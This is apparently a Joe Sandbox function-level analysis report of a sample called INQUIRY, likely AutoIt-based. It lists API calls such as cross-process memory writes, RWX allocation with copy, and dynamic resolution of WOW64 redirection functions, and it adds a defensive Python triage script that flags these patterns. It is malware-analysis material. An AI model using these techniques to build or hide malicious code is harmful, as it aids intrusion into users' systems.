                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75276
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A75280
                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
                                                                                              • Instruction ID: 64591c7c2261043d0fff6a4a5804f5111207f4e1d4bc4f0be205006162cc58a2
                                                                                              • Opcode Fuzzy Hash: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
                                                                                              • Instruction Fuzzy Hash: 6C013931D01A19DBCF00EFE5DC485EDBB78BB09711F508156EA49F2142DF70555187E5
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
                                                                                              • Instruction ID: 0c47e4f50e077610a961399b22c8de0f7f1a505646898fde2b5ad94b05f9e0be
                                                                                              • Opcode Fuzzy Hash: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
                                                                                              • Instruction Fuzzy Hash: 43F04F71300304AFEB214FA5EC99E6B3BACEF4A758B100226FA45C6160DE659942DA60
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A6C1F7
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A6C20E
                                                                                              • MessageBeep.USER32(00000000), ref: 00A6C226
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00A6C242
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A6C25C
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
                                                                                              • Instruction ID: 87f7166c59062f4108a321b5a82783ffbae659587c0928c3b33f6afd4885ad94
                                                                                              • Opcode Fuzzy Hash: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
                                                                                              • Instruction Fuzzy Hash: 6A01DB306043049BEB20ABB0DD5EFE67778FF00705F04026AFA82D14E0DBF469558B90
                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 00A113BF
                                                                                              • StrokeAndFillPath.GDI32(?,?,00A4B888,00000000,?), ref: 00A113DB
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A113EE
                                                                                              • DeleteObject.GDI32 ref: 00A11401
                                                                                              • StrokePath.GDI32(?), ref: 00A1141C
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
                                                                                              • Instruction ID: ff1f3db66a3089081f5319900900ff1964f583a13c2c05f1576dfd755a2f96cc
                                                                                              • Opcode Fuzzy Hash: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
                                                                                              • Instruction Fuzzy Hash: 4BF0CD30505708DFDB11DFA6EC4C79C3BA8AB01726F188226E53A890F1D7315596FF50
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A7C432
                                                                                              • CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7C44A
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • CoUninitialize.OLE32 ref: 00A7C6B7
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2683427295-24824748
APIs
  • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
  • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
  • Part of subcall function 00A17A51: _memmove.LIBCMT ref: 00A17AAB
• __swprintf.LIBCMT ref: 00A22ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A22D66
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456
APIs
  • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
• CoInitialize.OLE32(00000000), ref: 00A7B9BB
• CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7B9D4
• CoUninitialize.OLE32 ref: 00A7B9F1
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00A350AD
  • Part of subcall function 00A400F0: __87except.LIBCMT ref: 00A4012B
Strings
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
APIs
Strings
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
APIs
  • Part of subcall function 00A714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A69296,?,?,00000034,00000800,?,00000034), ref: 00A714E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A6983F
  • Part of subcall function 00A71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00A714B1
  • Part of subcall function 00A713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00A71409
  • Part of subcall function 00A713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A71419
  • Part of subcall function 00A713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A7142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698F9
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A9F910,00000000,?,?,?,?), ref: 00A979DF
• GetWindowLongW.USER32 ref: 00A979FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A97A0C
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A97461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A97475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00A97499
Strings
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A97C4A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A97C58
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A97C5F
Strings
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A96D3B
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A96D4B
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A96D70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
                                                                                              • Instruction ID: 397d13b793310de7c0d749e1e93596d599a38d630898d380f360a7c9e63c5903
                                                                                              • Opcode Fuzzy Hash: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
                                                                                              • Instruction Fuzzy Hash: BE219232710118BFDF118F54DC45FEB3BBAEF89750F118129FA559B1A0CA719C5297A0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A97772
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A97787
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A97794
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
                                                                                              • Instruction ID: 3eaece3497b8814688981390fda9735d5fa48aa400326320188c6ee592b61709
                                                                                              • Opcode Fuzzy Hash: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
                                                                                              • Instruction Fuzzy Hash: 44112372210208BEEF249FA0CC05FEB37A8EF88B54F120528FA41A6090C672E811CB20
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00A14B83,?), ref: 00A14C44
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A14C56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-1355242751
                                                                                              • Opcode ID: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
                                                                                              • Instruction ID: 28bc771e28de0fccc53113b18b17daf2a49ddbf989bb02bde296dcbee581e94b
                                                                                              • Opcode Fuzzy Hash: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
                                                                                              • Instruction Fuzzy Hash: 9ED01730B10713DFDB209F75D95864A76E4AF09352B218C3EA596DA160EB70D8C0CA90
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00A14BD0,?,00A14DEF,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14C11
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A14C23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-3689287502
                                                                                              • Opcode ID: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
                                                                                              • Instruction ID: fb0769dcd0cb1a67ccdd5b77f407d314a7d23c604c5fd3fafabc325a75ce417b
                                                                                              • Opcode Fuzzy Hash: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
                                                                                              • Instruction Fuzzy Hash: 54D01230611713DFDB209FB5D948A46B6D9EF09351B218C3E9485D6160EAB0D4C1C690
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00A91039), ref: 00A90DF5
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A90E07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
                                                                                              • Instruction ID: 1413c68468dca8d97d3d2488e0b71d30a0a8e0ef3c12aa8e11fc9e3fd511764e
                                                                                              • Opcode Fuzzy Hash: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
                                                                                              • Instruction Fuzzy Hash: 4CD01770610726DFDB209FB5D848B8776E5AF14392F228C7E9586D2160EAB4D890CA90
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A88CF4,?,00A9F910), ref: 00A890EE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A89100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 2574300362-199464113
                                                                                              • Opcode ID: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
                                                                                              • Instruction ID: 2a6fcea3cd1d275333fba510a3ac687c4fd619e4ae84f885f6f06da3a13ac267
                                                                                              • Opcode Fuzzy Hash: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
                                                                                              • Instruction Fuzzy Hash: 52D0E234A54723DFDB20AF71D85C61676E4AF05351B268D3E9586D65A0EB74C880CB90
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime__swprintf
                                                                                              • String ID: %.3d$WIN_XPe
                                                                                              • API String ID: 2070861257-2409531811
                                                                                              • Opcode ID: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
                                                                                              • Instruction ID: c23b03f099948b0e4463b490f9b6fa9f11c61c19c1db80cae82400ceed50a4cf
                                                                                              • Opcode Fuzzy Hash: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
                                                                                              • Instruction Fuzzy Hash: 22D01772948108FBCB009B949889EFA77BCBB0C312F142562B806E2040E2358B98EE21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
                                                                                              • Instruction ID: b31099e1469ff61fa69a33ff66a5760004d4dccccb3e2225bed38a1ed526b6aa
                                                                                              • Opcode Fuzzy Hash: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
                                                                                              • Instruction Fuzzy Hash: FDC16174A14216EFCB14CFA8C888EAEBBB5FF48718B158599E805DB351DB30DD81DB90
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A8E0BE
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A8E101
                                                                                                • Part of subcall function 00A8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A8E301
                                                                                              • _memmove.LIBCMT ref: 00A8E314
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3659485706-0
                                                                                              • Opcode ID: a9b75d05c7630b5605b294f139bd7fdb0ce37fd4ccd83dcdab4fb4e2d87b05e3
                                                                                              • Instruction ID: b9085f7c99f87aeedeef30206b0cd91abcb07374164b6a5240352a6f543bb616
                                                                                              • Opcode Fuzzy Hash: a9b75d05c7630b5605b294f139bd7fdb0ce37fd4ccd83dcdab4fb4e2d87b05e3
                                                                                              • Instruction Fuzzy Hash: 06C13771A08301DFC714EF28C490A6ABBE4FF89754F14896EF8999B351D731E946CB82
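                                                                                              The API references in the function blocks above are what an analyst pulls out of a Joe Sandbox function listing by hand: LoadLibraryA/GetProcAddress pairs that resolve Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW and GetModuleHandleExW at run time instead of importing them, and a VirtualAlloc(NULL, 0x77, MEM_COMMIT|MEM_RESERVE, 0x40) whose protection constant 0x40 is PAGE_EXECUTE_READWRITE, immediately followed by _memmove into the new region. The Python script below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses API entries written in the report's own text format, flags RWX allocations that are directly followed by a copy, and pairs each watched GetProcAddress with the nearest preceding LoadLibraryA. The embedded sample lines are copied from the blocks above; the watch list and its one-line descriptions are the editor's choice and can be extended.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: API lines in the exact text format of the report above,
# embedded so the script runs offline. Paste real report text here instead.
SAMPLE = """\
APIs
• CharLowerBuffW.USER32(?,?), ref: 00A8E0BE
  • Part of subcall function 00A8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A8E301
• _memmove.LIBCMT ref: 00A8E314
• LoadLibraryA.KERNEL32(kernel32.dll,?,00A14BD0,?), ref: 00A14C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A14C23
• LoadLibraryA.KERNEL32(advapi32.dll,?,00A91039), ref: 00A90DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A90E07
• CoUninitialize.OLE32 ref: 00A880CE
"""

# One "API" entry: optional sub-call prefix, Api.MODULE, optional (args), "ref:" address.
LINE_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PAGE_EXECUTE_READWRITE = 0x40  # winnt.h; the 4th VirtualAlloc argument in the report

# APIs that deserve a second look when resolved at run time rather than imported
# statically. The descriptions are the editor's one-line summaries of documented behaviour.
WATCHED_RESOLUTIONS = {
    "Wow64DisableWow64FsRedirection": "turns off WOW64 file-system redirection",
    "Wow64RevertWow64FsRedirection": "restores WOW64 file-system redirection",
    "RegDeleteKeyExW": "deletes a registry key in a chosen 32/64-bit registry view",
    "GetModuleHandleExW": "obtains a handle to a loaded module",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall: bool


def parse_api_calls(text: str) -> List[ApiCall]:
    """Extract every API entry from report text, in order of appearance."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module").upper(), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:  # '?' (unknown) or a string literal such as kernel32.dll
        return None


def triage(calls: List[ApiCall]) -> List[Tuple[str, int, str]]:
    """Return (kind, ref, message) findings for RWX staging and dynamic API resolution."""
    findings = []
    last_library = None
    for i, c in enumerate(calls):
        if c.api in ("LoadLibraryA", "LoadLibraryW") and c.args:
            last_library = c.args[0]  # remembered for the GetProcAddress that follows
        elif c.api == "VirtualAlloc" and len(c.args) == 4:
            size, prot = _hex(c.args[1]), _hex(c.args[3])
            if prot == PAGE_EXECUTE_READWRITE:
                size_s = f"0x{size:x}" if size is not None else "?"
                msg = f"RWX VirtualAlloc of {size_s} bytes"
                nxt = calls[i + 1] if i + 1 < len(calls) else None
                if nxt and nxt.api.lstrip("_") in ("memmove", "memcpy"):
                    msg += f", immediately followed by {nxt.api} at {nxt.ref:08X} (code staging)"
                findings.append(("rwx_alloc", c.ref, msg))
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if name in WATCHED_RESOLUTIONS:
                lib = last_library or "<unknown module>"
                findings.append(("dynamic_resolve", c.ref,
                                 f"{name} resolved from {lib}: {WATCHED_RESOLUTIONS[name]}"))
    return findings


if __name__ == "__main__":
    for kind, ref, msg in triage(parse_api_calls(SAMPLE)):
        print(f"[{kind}] {ref:08X}: {msg}")
```

Run it on the whole "APIs" section of a report to get one line per finding, keyed by the `ref:` address so each hit can be located in the IDA snapshot. The RWX rule deliberately matches only protection 0x40 and only reports "code staging" when the very next entry in the same function is a memmove/memcpy, because that adjacency is the distinctive pattern in the block above; an allocation that is RWX but never written to is still listed, just without the staging note.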
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A880C3
                                                                                              • CoUninitialize.OLE32 ref: 00A880CE
                                                                                                • Part of subcall function 00A6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A880D9
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A883AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
